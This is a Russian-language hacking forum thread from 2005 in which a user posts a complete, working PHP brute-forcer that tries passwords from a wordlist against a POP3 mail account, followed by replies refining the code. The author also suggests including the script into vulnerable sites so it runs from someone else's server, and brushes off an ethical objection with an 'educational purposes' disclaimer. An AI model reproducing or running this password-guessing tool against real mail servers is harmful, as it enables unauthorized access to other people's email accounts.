Security Teams



:::
Страницы: (2) [1] 2  ( Перейти к первому непрочитанному сообщению ) Закрытая темаСоздание новой темы

> Mail-bruteforce на php /для нубов/, (c) drmist
drmist
Дата 29.05.2005 - 20:54
Цитировать сообщение
Offline



Professional
*****

Профиль
Группа: -users-
Сообщений: 1165
Пользователь №: 222
Регистрация: 14.04.2005



Рейтинг:
(0%) -----


Код
<?
/*

Simple POP3 Bruter v 0.2

30/05/05 (с) drmist

*/

$port=110;
$host='127.0.0.1';
$login='user';
$passwords="passwords.txt";

set_time_limit(0);

$FID=fopen($passwords,"r");

while(!feof($FID))
{
 $pass=str_replace("\r","",fgets($FID));
 $pass=str_replace("\n","",$pass);
 
 echo "$pass<br>\r\n";
 flush();
 
 $s=fsockopen($host, $port);
 
 if(!$s)
    die("Не могу соединиться <b>[$host:$port]</b>!");
 
 $line=fread($s, 256);

  if(!ereg("\+OK(.*)",$line))
    die("Хрень какая-то. Ты точно на pop сервер коннектишься?");

 fputs($s,"USER $login\r\n");

 $line=fread($s, 256);
 
 if(ereg("-ERR(.*)",$line))
   die("Неверный логин <b>$login</b>!");

 fputs($s,"PASS $pass\r\n");
 
 $line=fread($s, 256);

 if(!ereg("-ERR(.*)",$line))
   die("Пароль найден: <b>$pass</b>!");

 fclose($s);
}

echo "Работа завершина. Пароль не найден =((";

?>


RFC


--------------------
Когда нельзя еще больше хочется...
PMСайт пользователя
Top
nerezus
Дата 30.05.2005 - 06:32
Цитировать сообщение
Offline



.:Вселенский отказник:.
***

Профиль
Группа: -users-
Сообщений: 302
Пользователь №: 265
Регистрация: 20.04.2005



Рейтинг:
(30%) XX---


вот из за этого:
Код
\r\n
работать будет только в денвере wink.gif (не проверял, но не должен пахать smile.gif на *никс серверах, если по фтп передавался файл с паролями, как текст)

Убираем "0D 0A"(твой пример)
Код
while(!feof($FID))
{
$pass=str_replace("\r\n","",fgets($FID));


Убираем "0D" и "0A"
Код
while(!feof($FID))
{
$pass=str_replace("\r","", fgets($FID));
$pass=str_replace("\n","", $pass);
PMICQ
Top
drmist
Дата 30.05.2005 - 11:37
Цитировать сообщение
Offline



Professional
*****

Профиль
Группа: -users-
Сообщений: 1165
Пользователь №: 222
Регистрация: 14.04.2005



Рейтинг:
(0%) -----


Цитата
работать будет только в денвере

Специально проверил - на никсах все работает.
Немного поправил исходник - место проверки валидности пароля.


--------------------
Когда нельзя еще больше хочется...
PMСайт пользователя
Top
drmist
Дата 30.05.2005 - 11:41
Цитировать сообщение
Offline



Professional
*****

Профиль
Группа: -users-
Сообщений: 1165
Пользователь №: 222
Регистрация: 14.04.2005



Рейтинг:
(0%) -----


Цитата
while(!feof($FID))
{
$pass=str_replace("\r","", fgets($FID));
$pass=str_replace("\n","", $pass);

впрочем, так правильнее, согласен


--------------------
Когда нельзя еще больше хочется...
PMСайт пользователя
Top
antiox
Дата 5.06.2005 - 16:16
Цитировать сообщение
Offline



Junior
*

Профиль
Группа: -users-
Сообщений: 12
Пользователь №: 327
Регистрация: 25.04.2005



Рейтинг:
(0%) -----


drmist, скажи, в чем смысл написания таких скриптов??
просто я это признаю только с целью самопродвижения в прогинге, ну т.е. для себя как бы пишешь, чтобы разобраться с новыми возможностями пхп и т.д...Принципиально нового ведь ничего нету.


--------------------
ICQ ::: 440043
PM
Top
drmist
Дата 5.06.2005 - 16:48
Цитировать сообщение
Offline



Professional
*****

Профиль
Группа: -users-
Сообщений: 1165
Пользователь №: 222
Регистрация: 14.04.2005



Рейтинг:
(0%) -----


Отвечаю: Для привлесения посетителей =).
Про скрипт меня спросили на hackzona.ru. точной ссылки дать не могу, тк там почему-то стоит редирект на disney.go.com megalol0.gif

https://forum.web-hack.ru/index.php?showtopic=2289
В данном случае для себя.
Я считаю этот скрипт удобным, тк
1) Он быстро работает.
2) Его можно инклудить в бажные скрипты. Тем самым он не сохраняется на машине, с которой идет скан.
3) Он мало весит
4) При желании сканер можно развить до уровня nmap
5) Просто сам по себе PHP - удобный язык.


--------------------
Когда нельзя еще больше хочется...
PMСайт пользователя
Top
Dmitriy
Дата 8.06.2005 - 00:04
Цитировать сообщение
Offline



Junior
*

Профиль
Группа: -users-
Сообщений: 21
Пользователь №: 9
Регистрация: 18.02.2005



Рейтинг:
(0%) -----


гм... очень близко в взломам... нехорошо
dont.gif


--------------------
Нафига козе баян? И Вы не знаете? Жаль...
--
Сумин Дмитрий Александрович
Интер-Телеком;
NetAssist : Русановская локальная сеть.
PM
Top
drmist
Дата 8.06.2005 - 18:28
Цитировать сообщение
Offline



Professional
*****

Профиль
Группа: -users-
Сообщений: 1165
Пользователь №: 222
Регистрация: 14.04.2005



Рейтинг:
(0%) -----


К каким таким взломам?
Господь помилуй =))
Все чисто в ознакомительных целях.

Я вобще никогда ни к чему такому не призываю. За все отвечает тот, кто будет использывать скрипт. wink.gif


--------------------
Когда нельзя еще больше хочется...
PMСайт пользователя
Top
nerezus
Дата 8.06.2005 - 20:58
Цитировать сообщение
Offline



.:Вселенский отказник:.
***

Профиль
Группа: -users-
Сообщений: 302
Пользователь №: 265
Регистрация: 20.04.2005



Рейтинг:
(30%) XX---


это for education purpose =)
что в этом плохого... аФтор не несет ответственности... =) и новичкам полезно скрипты поюзать, а не АЕТ2 =)
(/me не любит взломы, но иногда помогает в асе советами: обычно новички не знают, чего хотят smile.gif )
PMICQ
Top
paraZite
Дата 9.08.2005 - 21:00
Цитировать сообщение
Offline



Junior
*

Профиль
Группа: -users-
Сообщений: 10
Пользователь №: 772
Регистрация: 13.06.2005



Рейтинг:
(0%) -----


А разве поп сервер не заблочит на некоторое время запросы приходящие от скрипта после нескольких неудачных попыток? Да и резюм сюда не помешает добавить) Вобщем развиваем проект дальше до уровня гидры))

Это сообщение отредактировал paraZite - 10.08.2005 - 08:01
PM
Top

Опции темы Страницы: (2) [1] 2  Закрытая темаСоздание новой темы